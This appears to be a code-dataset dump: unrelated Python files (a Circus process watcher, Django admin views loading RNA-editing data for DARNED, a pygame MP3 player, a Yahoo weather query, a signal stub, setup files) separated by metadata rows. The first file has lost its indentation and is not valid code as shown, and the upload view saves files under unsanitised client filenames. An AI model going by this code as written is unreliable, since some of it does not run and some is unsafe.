process = processes.pop(0)
if process.status == STATUS_DEAD:
self.processes.pop(process.pid)
else:
self.processes.pop(process.pid)
self.kill_process(process)
@util.debuglog
def reap_and_manage_processes(self):
"""Reap & manage processes.
"""
if self.stopped:
return
self.reap_processes()
self.manage_processes()
@util.debuglog
def spawn_processes(self):
"""Spawn processes.
"""
for i in range(self.numprocesses - len(self.processes)):
self.spawn_process()
time.sleep(self.warmup_delay)
def _get_sockets_fds(self):
# XXX should be cached
fds = {}
for name, sock in self.sockets.items():
fds[name] = sock.fileno()
return fds
def spawn_process(self):
"""Spawn process.
"""
if self.stopped:
return
cmd = util.replace_gnu_args(self.cmd, sockets=self._get_sockets_fds())
self._process_counter += 1
nb_tries = 0
while nb_tries < self.max_retry:
process = None
try:
process = Process(self._process_counter, cmd,
args=self.args, working_dir=self.working_dir,
shell=self.shell, uid=self.uid, gid=self.gid,
env=self.env, rlimits=self.rlimits,
executable=self.executable, use_fds=self.use_sockets,
watcher=self)
# stream stderr/stdout if configured
if self.stdout_redirector is not None:
self.stdout_redirector.add_redirection('stdout',
process,
process.stdout)
if self.stderr_redirector is not None:
self.stderr_redirector.add_redirection('stderr',
process,
process.stderr)
self.processes[process.pid] = process
logger.debug('running %s process [pid %d]', self.name,
process.pid)
            except OSError as e:
logger.warning('error in %r: %s', self.name, str(e))
if process is None:
nb_tries += 1
continue
else:
self.notify_event("spawn", {"process_pid": process.pid,
"time": time.time()})
time.sleep(self.warmup_delay)
return
self.stop()
def kill_process(self, process, sig=signal.SIGTERM):
"""Kill process.
"""
# remove redirections
if self.stdout_redirector is not None:
self.stdout_redirector.remove_redirection('stdout', process)
if self.stderr_redirector is not None:
self.stderr_redirector.remove_redirection('stderr', process)
try:
self.send_signal(process.pid, sig)
self.notify_event("kill", {"process_pid": process.pid,
"time": time.time()})
except NoSuchProcess:
# already dead !
return
process.stop()
@util.debuglog
def kill_processes(self, sig):
"""Kill all the processes of this watcher.
"""
for process in self.get_active_processes():
try:
self.kill_process(process, sig)
except OSError as e:
if e.errno != errno.ESRCH:
raise
@util.debuglog
def send_signal(self, pid, signum):
if pid in self.processes:
process = self.processes[pid]
process.send_signal(signum)
else:
logger.debug('process %s does not exist' % pid)
def send_signal_processes(self, signum):
for pid in self.processes:
try:
self.send_signal(pid, signum)
except OSError as e:
if e.errno != errno.ESRCH:
raise
@util.debuglog
def send_signal_child(self, pid, child_id, signum):
"""Send signal to a child.
"""
process = self.processes[pid]
try:
process.send_signal_child(int(child_id), signum)
except OSError as e:
if e.errno != errno.ESRCH:
raise
@util.debuglog
def send_signal_children(self, pid, signum):
"""Send signal to all children.
"""
process = self.processes[int(pid)]
process.send_signal_children(signum)
@util.debuglog
def status(self):
if self.stopped:
return "stopped"
return "active"
@util.debuglog
def process_info(self, pid):
process = self.processes[int(pid)]
return process.info()
@util.debuglog
def info(self):
return dict([(proc.pid, proc.info())\
for proc in self.processes.values()])
@util.debuglog
def stop(self):
"""Stop.
"""
logger.debug('stopping the %s watcher' % self.name)
# stop redirectors
if self.stdout_redirector is not None:
self.stdout_redirector.kill()
if self.stderr_redirector is not None:
self.stderr_redirector.kill()
limit = time.time() + self.graceful_timeout
logger.debug('gracefully stopping processes [%s] for %ss' % (
self.name, self.graceful_timeout))
while self.get_active_processes() and time.time() < limit:
self.kill_processes(signal.SIGTERM)
try:
time.sleep(0.1)
except KeyboardInterrupt:
pass
self.reap_processes()
self.kill_processes(signal.SIGKILL)
if self.evpub_socket is not None:
self.notify_event("stop", {"time": time.time()})
self.stopped = True
logger.info('%s stopped', self.name)
def get_active_processes(self):
"""return a list of pids of active processes (not already stopped)"""
return [p for p in self.processes.values()
if p.status not in (DEAD_OR_ZOMBIE, UNEXISTING)]
@property
def pids(self):
"""Returns a list of PIDs"""
return [process.pid for process in self.processes]
@util.debuglog
def start(self):
"""Start.
"""
if not self.stopped:
return
self.stopped = False
self._create_redirectors()
self.reap_processes()
self.manage_processes()
if self.stdout_redirector is not None:
self.stdout_redirector.start()
if self.stderr_redirector is not None:
self.stderr_redirector.start()
logger.info('%s started' % self.name)
self.notify_event("start", {"time": time.time()})
@util.debuglog
def restart(self):
"""Restart.
"""
self.notify_event("restart", {"time": time.time()})
self.stop()
self.start()
logger.info('%s restarted', self.name)
@util.debuglog
def reload(self, graceful=True):
""" reload
"""
if self.prereload_fn is not None:
self.prereload_fn(self)
if not graceful:
return self.restart()
if self.send_hup:
for process in self.processes.values():
logger.info("SENDING HUP to %s" % process.pid)
process.send_signal(signal.SIGHUP)
else:
for i in range(self.numprocesses):
self.spawn_process()
self.manage_processes()
self.notify_event("reload", {"time": time.time()})
logger.info('%s reloaded', self.name)
@util.debuglog
def incr(self, nb=1):
if self.singleton and self.numprocesses == 1:
raise ValueError('Singleton watcher has a single process')
self.numprocesses += nb
self.manage_processes()
return self.numprocesses
@util.debuglog
def decr(self, nb=1):
if self.numprocesses > 0:
self.numprocesses -= nb
self.manage_processes()
return self.numprocesses
def set_opt(self, key, val):
"""Set a watcher option.
        This function sets the watcher option; unknown keys are ignored.
        It returns an action number:
- 0: trigger the process management
- 1: trigger a graceful reload of the processes;
"""
action = 0
if key in self._options:
self._options[key] = val
action = -1 # XXX for now does not trigger a reload
elif key == "numprocesses":
val = int(val)
if self.singleton and val > 1:
raise ValueError('Singleton watcher has a single process')
self.numprocesses = val
elif key == "warmup_delay":
self.warmup_delay = float(val)
elif key == "working_dir":
self.working_dir = val
action = 1
elif key == "uid":
self.uid = util.to_uid(val)
action = 1
elif key == "gid":
self.gid = util.to_gid(val)
action = 1
elif key == "send_hup":
self.send_hup = val
elif key == "shell":
self.shell = val
action = 1
elif key == "env":
self.env = val
action = 1
elif key == "cmd":
self.cmd = val
action = 1
elif key == "graceful_timeout":
self.graceful_timeout = float(val)
action = -1
# send update event
self.notify_event("updated", {"time": time.time()})
return action
def do_action(self, num):
# trigger needed action
self.stopped = False
if num == 1:
for i in range(self.numprocesses):
self.spawn_process()
self.manage_processes()
else:
self.reap_and_manage_processes()
@util.debuglog
def options(self, *args):
options = []
for name in sorted(self.optnames):
if name in self._options:
options.append((name, self._options[name]))
else:
options.append((name, getattr(self, name)))
return options
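# Illustrative construction sketch (simplified; watchers are normally built by
# the Arbiter from the circus.ini config rather than by hand):
#   watcher = Watcher(name="web", cmd="python myapp.py", numprocesses=2)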
| 33.29108
| 79
| 0.56889
| 20,895
| 0.982231
| 0
| 0
| 7,978
| 0.375029
| 0
| 0
| 6,172
| 0.290133
|
4739f9dd85a98ca4914a3d95480d40fee9c3fdfc
| 192
|
py
|
Python
|
ex021.py
|
Jordemar-D-Bousquet/Exercicios_Python
|
705d4c83720db033841f01aa843e4dbab08f1423
|
[
"MIT"
] | null | null | null |
ex021.py
|
Jordemar-D-Bousquet/Exercicios_Python
|
705d4c83720db033841f01aa843e4dbab08f1423
|
[
"MIT"
] | null | null | null |
ex021.py
|
Jordemar-D-Bousquet/Exercicios_Python
|
705d4c83720db033841f01aa843e4dbab08f1423
|
[
"MIT"
] | null | null | null |
# Write a Python program that opens and plays the audio of an MP3 file.
from pygame import mixer
mixer.init()
mixer.music.load('ex021.mp3')
mixer.music.play()
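# mixer.music.play() returns immediately (playback is non-blocking); the
# input() call below keeps the script alive while the track plays.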
input('Can you hear it now?')
| 21.333333
| 76
| 0.744792
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 107
| 0.551546
|
473a4e921e84f823480cb7ff0d481a46699ba915
| 15,171
|
py
|
Python
|
admin_views.py
|
JackCurragh/DARNED
|
13963d129bd8f69fb1106ad1f47394b3211a939c
|
[
"MIT"
] | null | null | null |
admin_views.py
|
JackCurragh/DARNED
|
13963d129bd8f69fb1106ad1f47394b3211a939c
|
[
"MIT"
] | null | null | null |
admin_views.py
|
JackCurragh/DARNED
|
13963d129bd8f69fb1106ad1f47394b3211a939c
|
[
"MIT"
] | null | null | null |
from django.http import HttpResponseRedirect, HttpResponse
from django.shortcuts import render_to_response
from django.core.context_processors import csrf
from admin_forms import *
from django.template import loader,RequestContext
from django.contrib.admin.views.decorators import staff_member_required
from Human.models import *
from Drosophila.models import *
from Mouse.models import *
#######UCSC Tables########
###For UCSC gene, SNP and Alu#####
##########################
#from models import *
from os import system
##############################################
########Thoughts for implementation##########
#Current state of update########
pth = "/home/DATA/Anmol/DARNED/uploaded_data/"#"/home/common_share/DARNED/uploaded_data"
dbpth= "/home/DATA/Anmol/DARNED/"#"/home/common_share/DARNED"
# Try to add information about assembly. And make it auto updatable
def saveData(uploadedFileName):
uploadedfile = str(uploadedFileName)
# saving input file content
#print uploadedfile
destination = open('%s/%s'%(pth,uploadedfile),'wb+')
for chunk in uploadedFileName.chunks():
destination.write(chunk)
destination.close()
######Human update start########
def human(flname):
infile = open("%s/%s"%(pth,flname))
outfile = open("%s/%s.err"%(pth,flname),"w")
for line in infile:
data = line[:-1].split('\t')
#tmplt = loader.
# print "Send Error that it is no related to humans"
coor = HSCoordinate.objects.filter(assembly=int(data[0]),chrom=data[1],coordinate=int(data[2]),strand=data[3],indna = data[4],inref = data[5], inrna = data[6])#add nucleotide info
if len(coor) != 0:
if data[15] != '-':
tissues = data[15].split(',')
for tissue in tissues:
if len(tissue)<2:
continue
#print tissue.upper(),"Anmol"
tis = coor.filter(source__source = tissue.upper())
if len(tis) == 0:
try:
tss = HSSource.objects.get(source=tissue.upper())
except:
tss = HSSource.objects.create(source=tissue.upper())
for cr in coor:
cr.source.add(tss)
pubids = data[16].split(':')
authors = data[17].split(':')
years = data[18].split(':')
pubnum = len(pubids)
for j in range(pubnum):
pbd = coor.filter(pubid__pubid=pubids[j])
if len(pbd) == 0:
try:
pbdx = HSPubMed.objects.get(pubid=pubids[j])
except:
pbdx = HSPubMed.objects.create(pubid = pubids[j],author=authors[j],year=years[j])
for cr in coor:
cr.pubid.add(pbdx)
else:
coor = HSCoordinate.objects.create(assembly=int(data[0]),chrom=data[1],coordinate=int(data[2]),strand=data[3], indna=data[4],inref=data[5],inrna=data[6],seqtype = data[12])
if data[7] != '-':
coor.snp = data[7]
if data[8]=='+':
coor.snpunvalid = 1
else:
coor.snpunvalid = 0
validations = data[9].split(',')
for validation in validations:
try:
vld = HSSnpValidation.objects.get(validation=validation)
except:
vld = HSSnpValidation.objects.create(validation=validation)
coor.snpvalidation.add(vld)
#print data[11]
if data[10] != '-':
if data[12] == 'E':
coor.exotype = data[13]
try:
gene = HSGene.objects.get(gene=data[10])
except:
#print data[10],data[11],data[12],data[13]
gene = HSGene.objects.create(gene=data[10],geneid=int(data[11]))
coor.gene = gene
if data[14] != '-':
coor.alu = data[14]
if data[15] != '-':
sources = data[15].split(',')
for source in sources:
if len(source) <2:
continue
try:
src = HSSource.objects.get(source = source.upper())
except:
src = HSSource.objects.create(source = source.upper())
coor.source.add(src)
pubmeds = data[16].split(':')
authors = data[17].split(':')
years = data[18].split(':')
pubnum = len(pubmeds)
for j in range(pubnum):
try:
pbd = HSPubMed.objects.get(pubid=pubmeds[j])
except:
pbd = HSPubMed.objects.create(pubid = pubmeds[j],author = authors[j],year=years[j])
coor.pubid.add(pbd)
coor.save()
infile.close()
outfile.close()
#######Human update End######
########Drosophila Update Start#######
def drosophila(flname):#add assembly and from to and refid
infile = open("%s/%s"%(pth,flname))
for line in infile:
data = line[:-1].split('\t')
coor = DMCoordinate.objects.filter(assembly=data[0],chrom=data[1],coordinate=int(data[2]),strand=data[3],indna=data[4],inref=data[5],inrna=data[6])
if len(coor) != 0:
pbd = coor.filter(pubid__pubid=data[12])
if len(pbd) == 0:
try:
pbdx = DMPubMed.objects.get(pubid=data[12])
except:
pbdx = DMPubMed.objects.create(pubid = data[12],author= data[13],year=data[14])
for cr in coor:
cr.pubid.add(pbdx)
else:
coor = DMCoordinate.objects.create(assembly=data[0],chrom=data[1],coordinate=int(data[2]),strand=data[3], indna=data[4],inref=data[5],inrna=data[6],seqtype = data[9])
if data[7] != '-':
if data[9] == 'E':
coor.exotype = data[10]
try:
gene = DMGene.objects.get(gene=data[7])
except:
gene = DMGene.objects.create(gene=data[7],geneid=data[8])
coor.gene = gene
if data[11] != '-':
coor.alu = data[11]
try:
pbd = DMPubMed.objects.get(pubid=data[12])
except:
pbd = DMPubMed.objects.create(pubid = data[12],author = data[13],year=data[14])
coor.pubid.add(pbd)
coor.save()
infile.close()
######Drosophila update End#####
########Mouse Update Start#######
def mouse(flname):
infile = open("%s/%s"%(pth,flname))
outfile = open("%s/%s.err"%(pth,flname),"w")
for line in infile:
data = line[:-1].split('\t')
#print data
#tmplt = loader.
#print "Send Error that it is no related to humans"
coor = MMCoordinate.objects.filter(assembly=int(data[0]),chrom=data[1],coordinate=int(data[2]),strand=data[3],indna = data[4],inref = data[5], inrna = data[6])#add nucleotide info
if len(coor) != 0:
if data[15] != '-':
tissues = data[15].split(',')
for tissue in tissues:
if len(tissue)<2:
continue
#print tissue.upper(),"Anmol"
tis = coor.filter(source__source = tissue.upper())
if len(tis) == 0:
try:
tss = MMSource.objects.get(source=tissue.upper())
except:
tss = MMSource.objects.create(source=tissue.upper())
for cr in coor:
cr.source.add(tss)
pubids = data[16].split(':')
authors = data[17].split(':')
years = data[18].split(':')
pubnum = len(pubids)
for j in range(pubnum):
pbd = coor.filter(pubid__pubid=pubids[j])
if len(pbd) == 0:
try:
pbdx = MMPubMed.objects.get(pubid=pubids[j])
except:
pbdx = MMPubMed.objects.create(pubid = pubids[j],author=authors[j],year=years[j])
for cr in coor:
cr.pubid.add(pbdx)
else:
coor = MMCoordinate.objects.create(assembly=int(data[0]),chrom=data[1],coordinate=int(data[2]),strand=data[3], indna=data[4],inref=data[5],inrna=data[6],seqtype = data[12])
if data[7] != '-':
coor.snp = data[7]
if data[8]=='+':
coor.snpunvalid = 1
else:
coor.snpunvalid = 0
validations = data[9].split(',')
for validation in validations:
try:
vld = MMSnpValidation.objects.get(validation=validation)
except:
vld = MMSnpValidation.objects.create(validation=validation)
coor.snpvalidation.add(vld)
#print data[11]
if data[10] != '-':
if data[12] == 'E':
coor.exotype = data[13]
try:
gene = MMGene.objects.get(gene=data[10])
except:
#print data[10],data[11],data[12],data[13]
gene = MMGene.objects.create(gene=data[10],geneid=int(data[11]))
coor.gene = gene
if data[14] != '-':
coor.alu = data[14]
if data[15] != '-':
sources = data[15].split(',')
for source in sources:
if len(source) <2:
continue
try:
src = MMSource.objects.get(source = source.upper())
except:
src = MMSource.objects.create(source = source.upper())
coor.source.add(src)
pubmeds = data[16].split(':')
authors = data[17].split(':')
years = data[18].split(':')
pubnum = len(pubmeds)
for j in range(pubnum):
try:
pbd = MMPubMed.objects.get(pubid=pubmeds[j])
except:
pbd = MMPubMed.objects.create(pubid = pubmeds[j],author = authors[j],year=years[j])
coor.pubid.add(pbd)
coor.save()
infile.close()
outfile.close()
#####Mouse Update End ##################
def upload_file(request):
if request.method == 'POST':
form = File_Upload(request.POST,request.FILES)
if form.is_valid():
filename = request.FILES['filename']
org = request.POST['org']
#exit(1)
flname = str(filename)
saveData(request.FILES['filename'])
if org=='HU':
human(flname)
elif org=='DR':
drosophila(flname)
elif org=='MO':
mouse(flname)
            # return HttpResponseRedirect('/success/url/')  # Write about the successful file upload and logs on a page; redirect via a middle file placed in a temp folder.
# else:
form = File_Upload()
toform = {'form':form,
'action':'/upload/'#it was /hu/
}
tmplt = loader.get_template('admin/data_upload.html')
return HttpResponse(tmplt.render(RequestContext(request,toform)))
# return render_to_response('/home/manu/Desktop/DARNED/templates/admin/uploadfile.html',{'form':form})
def sync(request):
###Human sync##########
for j in range(18,20):
hsfile = open("%s/staticfiles/downloads/hg%d.txt"%(dbpth,j),"w")
hsfile.write("chrom\tcoordinate\tstrand\tinchr\tinrna\tgene\tseqReg\texReg\tsource\tPubMed ID\n")
coors = HSCoordinate.objects.filter(assembly=j)
for coor in coors:
tsource = ""
tpub = ""
tgene = ""
tseq = "O"
texo = ""
            if coor.gene is not None:
                tgene = coor.gene.gene
            if coor.exotype is not None:
                tseq = "E"
                texo = coor.exotype
            else:
                tseq = "I"
            for src in coor.source.all():
                tsource += ",%s" % src.source
            for pbd in coor.pubid.all():
                tpub += ",%d" % pbd.pubid
hsfile.write("%s\t%d\t%s\t%s\t%s\t%s\t%s\t%s\t%s\t%s\n"%(coor.chrom,coor.coordinate,coor.strand,coor.indna,coor.inrna,tgene,tseq,texo,tsource[1:],tpub[1:]))
hsfile.close()
###Mouse sync##########
for j in range(9,11):
mmfile = open("%s/staticfiles/downloads/mm%d.txt"%(dbpth,j),"w")
mmfile.write("chrom\tcoordinate\tstrand\tinchr\tinrna\tgene\tseqReg\texReg\tsource\tPubMed ID\n")
coors = MMCoordinate.objects.filter(assembly=j)
for coor in coors:
tsource = ""
tpub = ""
tgene = ""
tseq = "O"
texo = ""
            if coor.gene is not None:
                tgene = coor.gene.gene
            if coor.exotype is not None:
                tseq = "E"
                texo = coor.exotype
            else:
                tseq = "I"
            # The header written above declares a source column, so this loop
            # must stay active; with it commented out every row carried an
            # empty source field.
            for src in coor.source.all():
                tsource += ",%s" % src.source
            for pbd in coor.pubid.all():
                tpub += ",%d" % pbd.pubid
mmfile.write("%s\t%d\t%s\t%s\t%s\t%s\t%s\t%s\t%s\t%s\n"%(coor.chrom,coor.coordinate,coor.strand,coor.indna,coor.inrna,tgene,tseq,texo,tsource[1:],tpub[1:]))
mmfile.close()
####Drosophila Sync###########
for j in range(3,4):
dmfile = open("%s/staticfiles/downloads/dm%d.txt"%(dbpth,j),"w")
dmfile.write("chrom\tcoordinate\tstrand\tinchr\tinrna\tgene\tseqReg\texReg\tPubMed ID\n")
        coors = DMCoordinate.objects.filter(assembly=j)
for coor in coors:
tpub=""
tgene = ""
tseq = "O"
texo = ""
            if coor.gene is not None:
                tgene = coor.gene.gene
            if coor.exotype is not None:
                tseq = "E"
                texo = coor.exotype
            else:
                tseq = "I"
            for pbd in coor.pubid.all():
                tpub += ",%d" % pbd.pubid
dmfile.write("%s\t%d\t%s\t%s\t%s\t%s\t%s\t%s\t%s\n"%(coor.chrom,coor.coordinate,coor.strand,coor.indna,coor.inrna,tgene,tseq,texo,tpub[1:]))
dmfile.close()
tmplt = loader.get_template("message.html")
return HttpResponse(tmplt.render(RequestContext(request,{'message':'Update finished'})))
upload_file = staff_member_required(upload_file)  # Make these views accessible only to administrators.
sync = staff_member_required(sync)
# Remove delete options from the default admin page; leaving them enabled may cause trouble.
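
# A minimal sketch of that removal, using Django's documented admin API
# (assumes this project uses the default admin site object):
from django.contrib import admin
admin.site.disable_action('delete_selected')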
| 40.564171
| 187
| 0.497265
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 2,515
| 0.165777
|
473a6e55a1141afc8bdd4f4dc054a62915b0f948
| 320
|
py
|
Python
|
Module 2/Chapter 7/ch7_yahooweatherapi.py
|
saicharanabhishek/machinelearning_examples
|
f89857ae7e1a2baa76951fe1d55541832d0f0d20
|
[
"MIT"
] | 101
|
2016-11-08T11:17:55.000Z
|
2021-12-24T10:43:32.000Z
|
Module 2/Chapter 7/ch7_yahooweatherapi.py
|
saicharanabhishek/machinelearning_examples
|
f89857ae7e1a2baa76951fe1d55541832d0f0d20
|
[
"MIT"
] | 2
|
2017-11-28T11:22:25.000Z
|
2019-02-12T17:09:18.000Z
|
Module 2/Chapter 7/ch7_yahooweatherapi.py
|
saicharanabhishek/machinelearning_examples
|
f89857ae7e1a2baa76951fe1d55541832d0f0d20
|
[
"MIT"
] | 102
|
2016-10-22T12:14:23.000Z
|
2022-03-26T19:59:09.000Z
|
# Ported from the original Python 2 urllib API to Python 3; note that Yahoo
# has since retired the public YQL service, so this request no longer
# succeeds against the live endpoint.
import json
import urllib.parse
import urllib.request

baseurl = 'https://query.yahooapis.com/v1/public/yql?'
yql_query = "select item.condition from weather.forecast where woeid=9807"
yql_url = baseurl + urllib.parse.urlencode({'q': yql_query}) + "&format=json"
result = urllib.request.urlopen(yql_url).read()
data = json.loads(result)
print(data['query']['results'])
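
# A hedged sketch of the same request with basic error handling; the timeout
# value and the None fallback are assumptions, not part of the original
# example, and fetch_yql is a hypothetical helper name.
import urllib.error

def fetch_yql(url, timeout=10):
    """Return the decoded JSON payload, or None if the request fails."""
    try:
        with urllib.request.urlopen(url, timeout=timeout) as resp:
            return json.loads(resp.read())
    except (urllib.error.URLError, ValueError):
        # URLError covers network and HTTP failures; ValueError covers bad JSON.
        return None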
| 32
| 74
| 0.7375
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 139
| 0.434375
|
473a74f5da28e0b4ce33777ece6a2e2116a72644
| 1,697
|
py
|
Python
|
lib/assets/Lib/signal.py
|
s6007589/cafe-grader-web
|
18a993801c698fb7b7ec6ae5f4b67920503cb242
|
[
"MIT"
] | 25
|
2016-09-04T07:34:13.000Z
|
2022-02-14T07:39:02.000Z
|
lib/assets/Lib/signal.py
|
it56660024/cafe-grader-web
|
e9a1305fd62e79e54f6961f97ddc5cd57bafd73c
|
[
"MIT"
] | 25
|
2015-02-05T03:59:27.000Z
|
2022-02-11T16:54:04.000Z
|
lib/assets/Lib/signal.py
|
it56660024/cafe-grader-web
|
e9a1305fd62e79e54f6961f97ddc5cd57bafd73c
|
[
"MIT"
] | 16
|
2016-09-05T00:30:27.000Z
|
2021-12-05T11:07:02.000Z
|
"""This module provides mechanisms to use signal handlers in Python.
Functions:
alarm() -- cause SIGALRM after a specified time [Unix only]
setitimer() -- cause a signal (described below) after a specified
float time and the timer may restart then [Unix only]
getitimer() -- get current value of timer [Unix only]
signal() -- set the action for a given signal
getsignal() -- get the signal action for a given signal
pause() -- wait until a signal arrives [Unix only]
default_int_handler() -- default SIGINT handler
signal constants:
SIG_DFL -- used to refer to the system default handler
SIG_IGN -- used to ignore the signal
NSIG -- number of defined signals
SIGINT, SIGTERM, etc. -- signal numbers
itimer constants:
ITIMER_REAL -- decrements in real time, and delivers SIGALRM upon
expiration
ITIMER_VIRTUAL -- decrements only when the process is executing,
and delivers SIGVTALRM upon expiration
ITIMER_PROF -- decrements both when the process is executing and
when the system is executing on behalf of the process.
Coupled with ITIMER_VIRTUAL, this timer is usually
used to profile the time spent by the application
in user and kernel space. SIGPROF is delivered upon
expiration.
*** IMPORTANT NOTICE ***
A signal handler function is called with two arguments:
the first is the signal number, the second is the interrupted stack frame."""
CTRL_BREAK_EVENT=1
CTRL_C_EVENT=0
NSIG=23
SIGABRT=22
SIGBREAK=21
SIGFPE=8
SIGILL=4
SIGINT=2
SIGSEGV=11
SIGTERM=15
SIG_DFL=0
SIG_IGN=1
def signal(signalnum, handler):
    """Stub: register *handler* for *signalnum* (a no-op in this environment)."""
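
# A short usage sketch matching the handler contract described in the
# docstring above (signal number plus interrupted frame); in this stub
# module the registration itself is a no-op. _example_handler is a
# hypothetical name, not part of the original file.
def _example_handler(signalnum, frame):
    print("caught signal", signalnum)

signal(SIGINT, _example_handler)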
| 32.634615
| 78
| 0.700059
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1,501
| 0.884502
|
473ed6ec1fc8acc6f0c2b764921eaea82a6ea886
| 400
|
py
|
Python
|
npc_engine/service_clients/__init__.py
|
npc-engine/npc-engine
|
0047794e96369c23515f794a1e77009c516a382c
|
[
"MIT"
] | 12
|
2021-11-10T21:03:19.000Z
|
2022-03-21T21:55:34.000Z
|
npc_engine/service_clients/__init__.py
|
npc-engine/npc-engine
|
0047794e96369c23515f794a1e77009c516a382c
|
[
"MIT"
] | 1
|
2021-12-05T14:51:44.000Z
|
2021-12-05T14:51:44.000Z
|
npc_engine/service_clients/__init__.py
|
npc-engine/npc-engine
|
0047794e96369c23515f794a1e77009c516a382c
|
[
"MIT"
] | null | null | null |
# flake8: noqa
"""Module implementing the clients for services."""
from npc_engine.service_clients.text_generation_client import TextGenerationClient
from npc_engine.service_clients.control_client import ControlClient
from npc_engine.service_clients.sequence_classifier_client import (
SequenceClassifierClient,
)
from npc_engine.service_clients.similarity_client import SimilarityClient
| 44.444444
| 83
| 0.8525
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 66
| 0.165
|
473f1e1eeb6b340b2ca16fc3da17da150f626195
| 661
|
py
|
Python
|
setup.py
|
libre-man/DJFeet
|
7517e7930bdc23d22765c64d7351d4011515dcaa
|
[
"MIT"
] | 2
|
2018-09-29T22:41:28.000Z
|
2018-10-02T16:07:11.000Z
|
setup.py
|
libre-man/DJFeet
|
7517e7930bdc23d22765c64d7351d4011515dcaa
|
[
"MIT"
] | null | null | null |
setup.py
|
libre-man/DJFeet
|
7517e7930bdc23d22765c64d7351d4011515dcaa
|
[
"MIT"
] | null | null | null |
try:
from setuptools import setup
except ImportError:
from distutils.core import setup
config = {
    'description': 'A program that acts as a DJ by using feedback provided by the dancers.',
'author': 'Thomas Schaper',
'url': 'https://gitlab.com/SilentDiscoAsAService/DJFeet',
'download_url': 'https://gitlab.com/SilentDiscoAsAService/DJFeet',
'author_email': 'thomas@libremail.nl',
'version': '0.0',
'install_requires': ['nose'],
'packages': ['dj_feet'],
'scripts': [],
'entry_points': {
'console_scripts': [
'server = dj_feet.cli:main'
]
},
'name': 'dj_feet'
}
setup(**config)
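
# Usage sketch: installing this package wires up the console script declared
# in entry_points, so the `server` command maps to dj_feet.cli:main, e.g.:
#
#     pip install .
#     server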
| 26.44
| 92
| 0.621785
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 400
| 0.605144
|